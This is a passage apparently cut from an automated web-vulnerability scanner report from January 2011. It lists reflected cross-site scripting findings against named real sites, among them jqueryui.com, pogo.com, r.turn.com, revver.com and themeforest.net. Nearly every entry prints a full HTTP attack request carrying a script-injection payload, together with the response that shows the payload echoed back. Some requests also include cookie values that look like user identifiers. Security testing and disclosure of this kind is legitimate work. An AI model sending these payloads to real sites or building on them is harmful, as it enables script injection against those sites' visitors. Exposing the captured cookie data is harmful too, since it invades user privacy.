GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=22222214e4b"><script>alert(1)</script>b72aaf12bf1&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c90a7"><script>alert(1)</script>c7e036c9077 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121c90a7"><script>alert(1)</script>c7e036c9077&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f591"><script>alert(1)</script>d1ac1d809d9 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif5f591"><script>alert(1)</script>d1ac1d809d9&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6dad"><script>alert(1)</script>f0f44656ea1 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1eme6dad"><script>alert(1)</script>f0f44656ea1&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c205d"><script>alert(1)</script>b9cc9cad223 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normalc205d"><script>alert(1)</script>b9cc9cad223&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120002
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14675"><script>alert(1)</script>e2b32383d99 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222214675"><script>alert(1)</script>e2b32383d99&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 109dc"><script>alert(1)</script>b91b6da52c2 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888109dc"><script>alert(1)</script>b91b6da52c2&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b66d"><script>alert(1)</script>e5fa0150d60 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222222b66d"><script>alert(1)</script>e5fa0150d60&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0941"><script>alert(1)</script>11047f5e754 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545b0941"><script>alert(1)</script>11047f5e754&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545b0941"><script>alert(1)</script>11047f5e754&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa ...[SNIP]...
3.548. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bbf1"><script>alert(1)</script>3e574682b3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?8bbf1"><script>alert(1)</script>3e574682b3b=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 117121
3.549. http://puzzle-games.pogo.com/games/bejeweled2 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://puzzle-games.pogo.com
Path:
/games/bejeweled2
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4250"><script>alert(1)</script>e0f9f21b207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/bejeweled2?a4250"><script>alert(1)</script>e0f9f21b207=1 HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae761"><script>alert(1)</script>e2f6fe1e8ae was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=ae761"><script>alert(1)</script>e2f6fe1e8ae&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:54 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:25:54 GMT Content-Length: 377
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8f9"><script>alert(1)</script>9c556335335 was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=4&sp=4b8f9"><script>alert(1)</script>9c556335335&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:54 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:25:54 GMT Content-Length: 377
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05e7"><script>alert(1)</script>a386b442d0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/426755/peanut-labsf05e7"><script>alert(1)</script>a386b442d0f/ HTTP/1.1 Host: revver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:57:06 GMT Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3 Expires: Sun, 09 Jan 2011 03:02:22 GMT Vary: Cookie Last-Modified: Sun, 09 Jan 2011 02:57:22 GMT ETag: 183ed9bf59280eb87751e627ee9c8247 Cache-Control: max-age=300 Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 81323
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <form action="/account/login/?next=/video/426755/peanut-labsf05e7"><script>alert(1)</script>a386b442d0f/" autocomplete="off" method="post"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f0f8'-alert(1)-'b9a0e02f466 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /user9f0f8'-alert(1)-'b9a0e02f466/freshface/portfolio HTTP/1.1 Host: themeforest.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Sun, 09 Jan 2011 02:28:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 404 Not Found Content-Length: 20137 Set-Cookie: _fd_session=BAh7BjoPc2Vzc2lvbl9pZCIlZDcyYTU2NzhmYjAyMDIyZGUzNzBmZmFlYzk3OTFiMjk%3D--534caac76947ead77491853a9ba47b4217755cb6; path=/; expires=Tue, 08-Jan-2013 14:28:55 GMT; HttpOnly Cache-Control: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <link href="h ...[SNIP]...
